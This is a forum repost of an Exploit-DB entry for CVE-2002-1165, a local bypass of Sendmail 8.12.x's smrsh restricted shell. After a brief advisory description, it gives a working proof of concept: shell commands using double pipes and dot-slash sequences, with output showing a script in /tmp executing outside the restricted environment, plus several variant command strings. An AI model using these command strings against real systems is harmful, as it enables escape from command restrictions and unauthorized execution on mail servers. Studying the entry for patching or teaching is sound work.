Exploit Sendmail 8.12.x - SMRSH Double Pipe Access Validation

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
21884
Проверка EDB
  1. Пройдено
Автор
ZEN-PARSE
Тип уязвимости
LOCAL
Платформа
UNIX
CVE
cve-2002-1165
Дата публикации
2002-10-01
Код:
source: https://www.securityfocus.com/bid/5845/info

Sendmail is a freely available, open source mail transport agent. It is maintained and distributed by the Sendmail Consortium. Sendmail is available for the Unix and Linux operating systems.

smrsh is designed to prevent the execution of commands outside of the restricted environment. However, when commands are entered using either double pipes (||) or a mixture of dot (.) and slash (/) characters, a user may be able to bypass the checks performed by smrsh. This could lead to the execution of commands outside of the restricted environment. 

$ echo "echo unauthorized execute" > /tmp/unauth
$ smrsh -c ". || . /tmp/unauth || ."
/bin/sh: /etc/smrsh/.: is a directory
unauthorized execute

OR one of the following types of commands:

smrsh -c "/ command"
smrsh -c "../ command"
smrsh -c "./ command"
smrsh -c "././ command"
 
Источник
www.exploit-db.com

Похожие темы